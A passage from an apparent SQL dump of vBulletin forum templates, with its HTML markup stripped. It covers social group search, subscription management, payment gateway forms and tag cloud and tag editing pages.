\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n\r\n$footer\r\n\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n $vboptions[bbtitle] - $pagetitle \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n\r\n \r\n $vbphrase[errors_occured_with_search]\r\n $grouplisttitle \r\n \r\n \r\n\r\n \r\n \r\n $errorlist \r\n \r\n $errorlist \r\n \r\n \r\n \r\n
\r\n \r\n \r\n\r\n\r\n\r\n\r\n $vbphrase[advanced_search] \r\n \r\n\r\n \r\n \r\n
\r\n \r\n \r\n \r\n $vbphrase[search_by_key_word] \r\n \r\n
$vbphrase[key_words]:
\r\n
\r\n
\r\n \r\n \r\n $vbphrase[find_groups_with] \r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[creation_date_filter] \r\n \r\n
$vbphrase[date_is_before]
\r\n
\r\n \r\n \r\n $vbphrase[month]
\r\n \r\n \r\n --- \r\n $vbphrase[january] \r\n $vbphrase[february] \r\n $vbphrase[march] \r\n $vbphrase[april] \r\n $vbphrase[may] \r\n $vbphrase[june] \r\n $vbphrase[july] \r\n $vbphrase[august] \r\n $vbphrase[september] \r\n $vbphrase[october] \r\n $vbphrase[november] \r\n $vbphrase[december] \r\n \r\n
\r\n \r\n \r\n $vbphrase[day]
\r\n
\r\n \r\n \r\n $vbphrase[year]
\r\n
\r\n \r\n \r\n
\r\n
$vbphrase[date_is_after]
\r\n
\r\n \r\n \r\n \r\n $vbphrase[month] \r\n
\r\n \r\n \r\n --- \r\n $vbphrase[january] \r\n $vbphrase[february] \r\n $vbphrase[march] \r\n $vbphrase[april] \r\n $vbphrase[may] \r\n $vbphrase[june] \r\n $vbphrase[july] \r\n $vbphrase[august] \r\n $vbphrase[september] \r\n $vbphrase[october] \r\n $vbphrase[november] \r\n $vbphrase[december] \r\n \r\n
\r\n \r\n \r\n $vbphrase[day]
\r\n
\r\n \r\n \r\n $vbphrase[year]
\r\n
\r\n \r\n \r\n
\r\n
\r\n \r\n\r\n \r\n $vbphrase[category_filter] \r\n \r\n
$vbphrase[is_in_category]
\r\n
\r\n \r\n $category_options\r\n \r\n
\r\n
\r\n \r\n \r\n \r\n
\r\n
\r\n\r\n \r\n \r\n
\r\n \r\n \r\n
\r\n \r\n \r\n \r\n \r\n\r\n$footer\r\n\r\n\r\n\r\n', 'template', 1219749641, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1608, -1, 'socialgroups_subscribe', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $pagetitle \r\n\r\n\r\n$header\r\n$navbar\r\n \r\nsession->vars[\'sessionurl\'] . \"\\\" method=\\\"post\\\" name=\\\"vbform\\\">\r\n\".(($discussion[\'discussionid\']) ? (\"\r\n \r\n\") : (\"\")).\"\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n\r\n\r\n\r\n \r\n $vbphrase[subscribe_to_discussion]: $discussion[title] \r\n \r\n \r\n\r\n \r\n \r\n
\r\n
\r\n $vbphrase[notification_type] \r\n \r\n
\r\n \r\n $vbphrase[no_email_notification] \r\n $vbphrase[instant_notification_by_email] \r\n \r\n
\r\n
\r\n \r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n \r\n\r\n \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $pagetitle \r\n\r\n\r\n$header\r\n$navbar\r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n $vbphrase[subscribe_to_discussion]: $discussion[title] \r\n \r\n \r\n\r\n \r\n \r\n
\r\n
\r\n $vbphrase[notification_type] \r\n \r\n
\r\n \r\n $vbphrase[no_email_notification] \r\n $vbphrase[instant_notification_by_email] \r\n \r\n
\r\n
\r\n \r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n \r\n\r\n \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1214237106, 'vBulletin Solutions', '3.7.1', 'vbulletin'),
(1609, -1, 'socialgroups_subscribe_group', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $pagetitle \r\n\r\n\r\n$header\r\n$navbar\r\n \r\nsession->vars[\'sessionurl\'] . \"\\\" method=\\\"post\\\" name=\\\"vbform\\\">\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n\r\n\r\n\r\n \r\n $vbphrase[subscribe_to_this_group]: $group[name] \r\n \r\n \r\n\r\n \r\n \r\n
\r\n
\r\n $vbphrase[notification_type] \r\n \r\n
\r\n \r\n $vbphrase[no_email_notification] \r\n $vbphrase[daily_email_notification] \r\n $vbphrase[weekly_email_notification] \r\n \r\n
\r\n
\r\n \r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n \r\n\r\n \r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $pagetitle \r\n\r\n\r\n$header\r\n$navbar\r\n \r\n\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n $vbphrase[subscribe_to_this_group]: $group[name] \r\n \r\n \r\n\r\n \r\n \r\n
\r\n
\r\n $vbphrase[notification_type] \r\n \r\n
\r\n \r\n $vbphrase[no_email_notification] \r\n $vbphrase[daily_email_notification] \r\n $vbphrase[weekly_email_notification] \r\n \r\n
\r\n
\r\n \r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n \r\n\r\n \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1234791867, 'vBulletin Solutions', '3.8.2', 'vbulletin'),
(1610, -1, 'socialgroups_subscriptions', '\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n\r\n\r\n \r\n\r\n\".(($pagenav) ? (\"\r\n\r\n
\r\n $pagenav\r\n
\r\n
\r\n\") : (\"\")).\"\r\n\r\n\".(($group_subscribe_list) ? (\"\r\n \r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n\r\n\r\n\r\n \r\n\") : (\"\")).\"', '\r\n \r\n \r\n\r\n\r\n \r\n\r\n\r\n\r\n
\r\n $pagenav\r\n
\r\n
\r\n \r\n\r\n\r\n \r\n\r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n ', 'template', 1234874971, 'vBulletin Solutions', '3.8.2', 'vbulletin'),
(1611, -1, 'socialgroups_transfer', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $custompagetitle \r\n \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n \r\n \r\n $vbphrase[transfer_group_ownership] \r\n \r\n \".((!$targetuser) ? (\"\r\n \r\n \r\n \r\n \r\n \r\n \") : (\"\r\n \r\n \r\n \" . construct_phrase(\"$vbphrase[group_ownership_transfer_request_sent_to_x]\", \"$userinfo[userid]\", \"$userinfo[username]\") . \"\r\n \r\n \r\n \r\n \r\n \r\n \")).\"\r\n
\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n $headinclude\r\n $vboptions[bbtitle] - $custompagetitle \r\n \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n \r\n \r\n $vbphrase[transfer_group_ownership] \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[group_ownership_transfer_request_sent_to_x] \r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n\r\n$footer\r\n\r\n', 'template', 1237458769, 'vBulletin Solutions', '3.8.2', 'vbulletin'),
(1612, -1, 'SUBSCRIBE', '\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n $vbphrase[subscribed_threads_in_folder]: \".(($show[\'allfolders\']) ? (\"$vbphrase[all]\") : (\"$folder\")).\" \r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[folder_controls] \r\n \r\n \r\n\r\n
\r\n
\r\n \r\n \r\n \r\n
\r\n \r\n\r\n \r\n\r\n\".(($show[\'pagenav\']) ? (\"\r\n\r\n\r\n $pagenav \r\n \r\n
\r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n\r\n\r\n\r\n \r\n\r\n\r\n\".(($show[\'pagenav\']) ? (\"\r\n\r\n\r\n $pagenav \r\n \r\n
\r\n\") : (\"\")).\"\r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[new_posts] \r\n \r\n \r\n \r\n $vbphrase[no_new_posts] \r\n \r\n \".(($GLOBALS[\'vbulletin\']->options[\'usehotthreads\']) ? (\"\r\n \r\n \r\n \" . construct_phrase(\"$vbphrase[more_than_x_replies_or_y_views]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'hotnumberposts\'] . \"\", \"\" . $GLOBALS[\'vbulletin\']->options[\'hotnumberviews\'] . \"\") . \" \r\n \r\n \r\n \r\n \" . construct_phrase(\"$vbphrase[more_than_x_replies_or_y_views]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'hotnumberposts\'] . \"\", \"\" . $GLOBALS[\'vbulletin\']->options[\'hotnumberviews\'] . \"\") . \" \r\n \r\n \") : (\"\")).\"\r\n \r\n \r\n $vbphrase[thread_is_closed] \r\n \r\n \".(($show[\'dotthreads\']) ? (\"\r\n \r\n \r\n $vbphrase[you_have_posted_in_this_thread] \r\n \r\n \") : (\"\")).\"\r\n
\r\n \r\n \r\n\r\n $forumjump \r\n \r\n
\r\n', '\r\n\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n $vbphrase[subscribed_threads_in_folder]: $vbphrase[all] $folder \r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[folder_controls] \r\n \r\n \r\n\r\n
\r\n
\r\n \r\n \r\n \r\n
\r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n $pagenav \r\n \r\n
\r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n $pagenav \r\n \r\n
\r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[new_posts] \r\n \r\n \r\n \r\n $vbphrase[no_new_posts] \r\n \r\n \r\n \r\n \r\n $vbphrase[more_than_x_replies_or_y_views] \r\n \r\n \r\n \r\n $vbphrase[more_than_x_replies_or_y_views] \r\n \r\n \r\n \r\n \r\n $vbphrase[thread_is_closed] \r\n \r\n \r\n \r\n \r\n $vbphrase[you_have_posted_in_this_thread] \r\n \r\n \r\n
\r\n \r\n \r\n\r\n $forumjump \r\n \r\n
\r\n', 'template', 1220364796, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1613, -1, 'subscribe_choosetype', '\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n \".(($show[\'subscribetothread\']) ? (\"\r\n $vbphrase[subscribe_to_thread]: $threadinfo[prefix_plain_html] $threadinfo[title] \r\n \") : (\"\r\n $vbphrase[subscribe_to_forum]: $foruminfo[title] \r\n \")).\"\r\n \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n \r\n \r\n $vbphrase[notification_type]: \r\n \r\n $vbphrase[no_email_notification] \r\n \".(($show[\'subscribetothread\']) ? (\"\r\n $vbphrase[instant_notification_by_email] \r\n \") : (\"\")).\"\r\n $vbphrase[daily_updates_by_email] \r\n $vbphrase[weekly_updates_by_email] \r\n \r\n \r\n \r\n \".(($show[\'folders\']) ? (\"\r\n \r\n \r\n $vbphrase[folder]: \r\n \r\n $folderbits\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n
\r\n\r\n
\r\n
\r\n\r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n ', '\r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[subscribe_to_thread]: $threadinfo[prefix_plain_html] $threadinfo[title] \r\n \r\n $vbphrase[subscribe_to_forum]: $foruminfo[title] \r\n \r\n \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n \r\n \r\n $vbphrase[notification_type]: \r\n \r\n $vbphrase[no_email_notification] \r\n \r\n $vbphrase[instant_notification_by_email] \r\n \r\n $vbphrase[daily_updates_by_email] \r\n $vbphrase[weekly_updates_by_email] \r\n \r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[folder]: \r\n \r\n $folderbits\r\n \r\n \r\n \r\n \r\n
\r\n\r\n
\r\n
\r\n\r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n ', 'template', 1213713538, 'vBulletin Solutions', '3.7.1', 'vbulletin'),
(1614, -1, 'subscribe_confirm_delete', '\r\n \r\n \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n \r\n $vbphrase[empty_current_folder] \r\n \r\n \r\n $vbphrase[are_you_sure_you_want_to_delete_these_subscriptions] \r\n \r\n \r\n \r\n \r\n
\r\n ', '\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[empty_current_folder] \r\n \r\n \r\n $vbphrase[are_you_sure_you_want_to_delete_these_subscriptions] \r\n \r\n \r\n \r\n \r\n
\r\n ', 'template', 1220365028, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1615, -1, 'subscribe_folderbit', '\r\n $vbphrase[folder_name] \r\n \r\n', '\r\n $vbphrase[folder_name] \r\n \r\n', 'template', 1070096688, 'vBulletin Solutions', '', 'vbulletin'),
(1616, -1, 'subscribe_move', '\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n\r\n\r\n\r\n ', '\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n ', 'template', 1208876083, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1617, -1, 'subscribe_showfolders', '\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n\r\n\r\n\r\n ', '\r\n \r\n \r\n \r\n\r\n\r\n\r\n ', 'template', 1208876065, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1618, -1, 'subscription', '\".(($show[\'activesubscriptions\']) ? (\"\r\n\r\n\r\n $vbphrase[active_subscriptions] \r\n \r\n\r\n $vbphrase[subscription_title] \r\n $vbphrase[start_date] \r\n $vbphrase[expiry_date] \r\n \r\n$subscribedbits\r\n
\r\n \r\n\") : (\"\")).\"\r\n\".(($show[\'subscriptions\']) ? (\"\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n\r\n\r\n $vbphrase[available_subscriptions] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n $subscriptionbits\r\n\r\n
\r\n $vbphrase[validity_periods_marked_indicate]\r\n
\r\n\r\n
\r\n
\r\n \r\n \r\n
\r\n \r\n\") : (\"\")).\"', '\r\n\r\n\r\n $vbphrase[active_subscriptions] \r\n \r\n\r\n $vbphrase[subscription_title] \r\n $vbphrase[start_date] \r\n $vbphrase[expiry_date] \r\n \r\n$subscribedbits\r\n
\r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n $vbphrase[available_subscriptions] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n $subscriptionbits\r\n\r\n
\r\n $vbphrase[validity_periods_marked_indicate]\r\n
\r\n\r\n
\r\n
\r\n \r\n \r\n
\r\n \r\n ', 'template', 1208876049, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1619, -1, 'subscription_activebit', '\r\n $subscription[title] \r\n $joindate \r\n $enddate \r\n ', '\r\n $subscription[title] \r\n $joindate \r\n $enddate \r\n ', 'template', 1069828812, 'vBulletin Solutions', '', 'vbulletin'),
(1620, -1, 'subscription_availablebit', '\r\n $subscription[title] \r\n \r\n ', '\r\n $subscription[title] \r\n \r\n ', 'template', 1121974038, 'vBulletin Solutions', '3.5.0 Release Candidate 1', 'vbulletin'),
(1621, -1, 'subscription_payment', '\r\n\r\n $vbphrase[select_payment_method] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[to_pay_for_your_subscription]\r\n
\r\n\r\n
\r\n
\r\n \r\n $vbphrase[subscription]: \r\n $subscription_title \r\n \r\n \r\n $vbphrase[duration]: \r\n $subscription_length \r\n \r\n \r\n $vbphrase[cost]: \r\n $subscription_cost \r\n \r\n
\r\n
\r\n\r\n $orderbits\r\n\r\n
\r\n
\r\n \r\n \r\n
', '\r\n\r\n $vbphrase[select_payment_method] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[to_pay_for_your_subscription]\r\n
\r\n\r\n
\r\n
\r\n \r\n $vbphrase[subscription]: \r\n $subscription_title \r\n \r\n \r\n $vbphrase[duration]: \r\n $subscription_length \r\n \r\n \r\n $vbphrase[cost]: \r\n $subscription_cost \r\n \r\n
\r\n
\r\n\r\n $orderbits\r\n\r\n
\r\n
\r\n \r\n \r\n
', 'template', 1125401481, 'vBulletin Solutions', '3.5.0 Release Candidate 3', 'vbulletin'),
(1622, -1, 'subscription_paymentbit', '\r\n \r\n \" . construct_phrase(\"$vbphrase[order_using_x]\", \"{$vbphrase[$method[classname]]}\") . \" \r\n \r\n
$vbphrase[$typetext]
\r\n
\r\n $form[hiddenfields]\r\n \r\n
\r\n
\r\n \r\n ', '\r\n \r\n $vbphrase[order_using_x] \r\n \r\n
$vbphrase[$typetext]
\r\n
\r\n $form[hiddenfields]\r\n $vbphrase[order_using_x]\" />\r\n
\r\n
\r\n \r\n ', 'template', 1119630159, 'vBulletin Solutions', '3.5.0 Beta 3', 'vbulletin'),
(1623, -1, 'subscription_payment_2checkout', ' \r\n \r\n \r\n \r\n ', ' \r\n \r\n \r\n \r\n ', 'template', 1170440078, 'vBulletin Solutions', '3.6.6', 'vbulletin'),
(1624, -1, 'subscription_payment_authorizenet', ' \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n options[\'bburl\'] . \"/payment_gateway.php?method=authorizenet\\\" />', ' \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[x_subscription]\" />\r\n \r\n ', 'template', 1168864955, 'vBulletin Solutions', '3.6.6', 'vbulletin'),
(1625, -1, 'subscription_payment_ccbill', ' \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n ', ' \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n ', 'template', 1146784809, 'vBulletin Solutions', '3.6.0 Beta 1', 'vbulletin'),
(1626, -1, 'subscription_payment_moneybookers', ' \r\n \r\n \r\n \r\n options[\'bburl\'] . \"/\" . $GLOBALS[\'vbulletin\']->options[\'forumhome\'] . \".php\\\" />\r\n options[\'bburl\'] . \"/\" . $GLOBALS[\'vbulletin\']->options[\'forumhome\'] . \".php\\\" />\r\n options[\'bburl\'] . \"/payment_gateway.php?method=moneybookers\\\" />\r\n \r\n ', ' \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n ', 'template', 1123594101, 'vBulletin Solutions', '3.5.0 Release Candidate 3', 'vbulletin'),
(1627, -1, 'subscription_payment_nochex', ' \r\n \r\n \r\n options[\'bburl\'] . \"\\\" />\r\n options[\'bburl\'] . \"/payment_gateway.php?method=nochex\\\" />', ' \r\n \r\n \r\n \r\n ', 'template', 1170869888, 'vBulletin Solutions', '3.6.6', 'vbulletin'),
(1628, -1, 'subscription_payment_paypal', '\".(($show[\'recurring\']) ? (\"\r\n \r\n\") : (\"\r\n \r\n\")).\"\r\n \r\n \r\n \r\n \r\n\".(($show[\'recurring\']) ? (\"\r\n \r\n \r\n \r\n \r\n \r\n\") : (\"\r\n \r\n\")).\"\r\n \r\n \r\n options[\'bburl\'] . \"/\" . $GLOBALS[\'vbulletin\']->options[\'forumhome\'] . \".php\\\" />\r\n options[\'bburl\'] . \"/\" . $GLOBALS[\'vbulletin\']->options[\'forumhome\'] . \".php\\\" />\r\n options[\'bburl\'] . \"/payment_gateway.php?method=paypal\\\" />\r\n \r\n \r\n\".(($show[\'notax\']) ? (\"\r\n \r\n\") : (\"\")).\"', '\r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[x_subscription]\" />\r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n ', 'template', 1168864939, 'vBulletin Solutions', '3.6.6', 'vbulletin'),
(1629, -1, 'subscription_payment_worldpay', ' \r\n \r\n \r\n \r\n ', ' \r\n \r\n \r\n \r\n $vbphrase[x_subscription]\" />', 'template', 1168864913, 'vBulletin Solutions', '3.6.6', 'vbulletin'),
(1630, -1, 'tagbit', 'session->vars[\'sessionurl\'] . \"tag=$tag_url\\\">$tag ', '$tag ', 'template', 1196350380, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1631, -1, 'tagbit_wrapper', '\".(($tag_list) ? (\"$tag_list\") : (\"$vbphrase[none] \")).\" ', '$tag_list$vbphrase[none] ', 'template', 1196437543, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1632, -1, 'tag_cloud_box', '\r\n\r\n \r\n \" . construct_phrase(\"$vbphrase[these_are_the_x_most_used_thread_tags]\", \"$cloud[count]\") . \"
\r\n $vbphrase[tag_cloud]\r\n \r\n \r\n\r\n $cloud[links] \r\n \r\n
', '\r\n\r\n \r\n $vbphrase[these_are_the_x_most_used_thread_tags] \r\n $vbphrase[tag_cloud]\r\n \r\n \r\n\r\n $cloud[links] \r\n \r\n
', 'template', 1196699009, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1633, -1, 'tag_cloud_box_search', '\r\n\r\n \r\n \" . construct_phrase(\"$vbphrase[these_are_the_x_most_searched_thread_tags]\", \"$cloud[count]\") . \"
\r\n $vbphrase[search_tag_cloud]\r\n \r\n \r\n\r\n $cloud[links] \r\n \r\n
', '\r\n\r\n \r\n $vbphrase[these_are_the_x_most_searched_thread_tags] \r\n $vbphrase[search_tag_cloud]\r\n \r\n \r\n\r\n $cloud[links] \r\n \r\n
', 'template', 1196698999, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1634, -1, 'tag_cloud_headinclude', '', '', 'template', 1196424223, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1635, -1, 'tag_cloud_link', 'session->vars[\'sessionurl\'] . \"tag=$thistag[tagtext_url]\\\" class=\\\"tagcloudlink level$thistag[level]\\\">$thistag[tagtext] ', '$thistag[tagtext] ', 'template', 1196425664, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1636, -1, 'tag_cloud_page', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[tags] \r\n\".(($show[\'inlinemod\']) ? (\"\") : (\"\")).\"\r\n$tag_cloud_headinclude\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\".(($tag_cloud) ? (\"\r\n $tag_cloud \r\n\") : (\"\")).\"\r\n\r\n\r\n\".(($GLOBALS[\'vbulletin\']->session->vars[\'sessionhash\']) ? (\"\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n\") : (\"\")).\"\r\n\r\n \r\n\r\n\".(($show[\'popups\']) ? (\"\r\n \r\n \r\n \r\n\") : (\"\")).\"\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[tags] \r\n \r\n$tag_cloud_headinclude\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n $tag_cloud \r\n \r\n\r\n\r\n\r\n \r\n \r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208876655, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1637, -1, 'tag_edit', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $threadinfo[title] - $vbphrase[tag_management] \r\n\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\".(($show[\'errors\']) ? (\"\r\n\r\n\r\n $vbphrase[errors] \r\n \r\n\r\n $errorlist \r\n \r\n
\r\n \r\n\") : (\"\")).\"\r\n\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n\r\n\r\n \r\n $vbphrase[thread] : session->vars[\'sessionurl\'] . \"t=$threadinfo[threadid]\\\">$threadinfo[title] \r\n $vbphrase[tag_management]\r\n \r\n \r\n\r\n \r\n \r\n
\r\n
\r\n $vbphrase[tags] \r\n \r\n \".(($tag_manage_options) ? (\"\r\n
$vbphrase[uncheck_tag_remove_bold_you]
\r\n
\r\n $tag_manage_options\r\n \r\n
\r\n \") : (\"\")).\"\r\n\r\n
\r\n \".(($show[\'add_option\']) ? (\"
text
\") : (\"\")).\"\r\n
\r\n
\r\n\r\n \".(($show[\'add_option\']) ? (\"\r\n
$vbphrase[add_tags] ($vbphrase[separate_tags_using_comma])
\r\n
\r\n \".(($show[\'tag_limit_phrase\']) ? (\"\r\n \".((!$tags_remain) ? (\"\r\n $vbphrase[cannot_add_tags_remove_first]\r\n \") : (\"\r\n \" . construct_phrase(\"$vbphrase[you_may_add_x_tags_to_thread]\", \"$tags_remain\") . \"\r\n \")).\"\r\n \") : (\"\")).\"\r\n $vbphrase[tags_visible_all_users]\r\n \") : (\"\")).\"\r\n
\r\n \r\n
\r\n
\r\n \r\n \r\n
\r\n \r\n\r\n\".(($show[\'popups\']) ? (\"\r\n \r\n \r\n \r\n\") : (\"\")).\"\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $threadinfo[title] - $vbphrase[tag_management] \r\n\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n\r\n $vbphrase[errors] \r\n \r\n\r\n $errorlist \r\n \r\n
\r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n\r\n \r\n $vbphrase[thread] : $threadinfo[title] \r\n $vbphrase[tag_management]\r\n \r\n \r\n\r\n \r\n \r\n
\r\n
\r\n $vbphrase[tags] \r\n \r\n
\r\n $vbphrase[uncheck_tag_remove_bold_you]
\r\n \r\n $tag_manage_options\r\n \r\n \r\n \r\n\r\n
\r\n\r\n
\r\n $vbphrase[add_tags] ($vbphrase[separate_tags_using_comma])
\r\n
\r\n \r\n \r\n $vbphrase[cannot_add_tags_remove_first]\r\n \r\n $vbphrase[you_may_add_x_tags_to_thread] \r\n \r\n \r\n $vbphrase[tags_visible_all_users]\r\n \r\n
\r\n \r\n
\r\n
\r\n \r\n \r\n
\r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n$footer\r\n\r\n', 'template', 1211458083, 'vBulletin Solutions', '3.7.1', 'vbulletin'),
(1638, -1, 'tag_edit_ajax', '\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n\r\n\r\n
\r\n $vbphrase[tags] \r\n \r\n \".(($tag_manage_options) ? (\"\r\n
$vbphrase[uncheck_tag_remove_bold_you]
\r\n
\r\n $tag_manage_options\r\n \r\n
\r\n \") : (\"\")).\"\r\n\r\n\r\n
\r\n \".(($show[\'add_option\']) ? (\"
text
\") : (\"\")).\"\r\n
\r\n
\r\n
\r\n
\r\n\r\n \".(($show[\'add_option\']) ? (\"\r\n
$vbphrase[add_tags] ($vbphrase[separate_tags_using_comma])
\r\n
\r\n \".(($show[\'tag_limit_phrase\']) ? (\"\r\n \".((!$tags_remain) ? (\"\r\n $vbphrase[cannot_add_tags_remove_first]\r\n \") : (\"\r\n \" . construct_phrase(\"$vbphrase[you_may_add_x_tags_to_thread]\", \"$tags_remain\") . \"\r\n \")).\"\r\n $vbphrase[tags_visible_all_users]\r\n \") : (\"\")).\"\r\n \") : (\"\")).\"\r\n
\r\n \r\n
\r\n \r\n\r\n\".(($show[\'popups\']) ? (\"\r\n \r\n\") : (\"\")).\"', '\r\n \r\n \r\n \r\n \r\n\r\n\r\n
\r\n $vbphrase[tags] \r\n \r\n
\r\n $vbphrase[uncheck_tag_remove_bold_you]
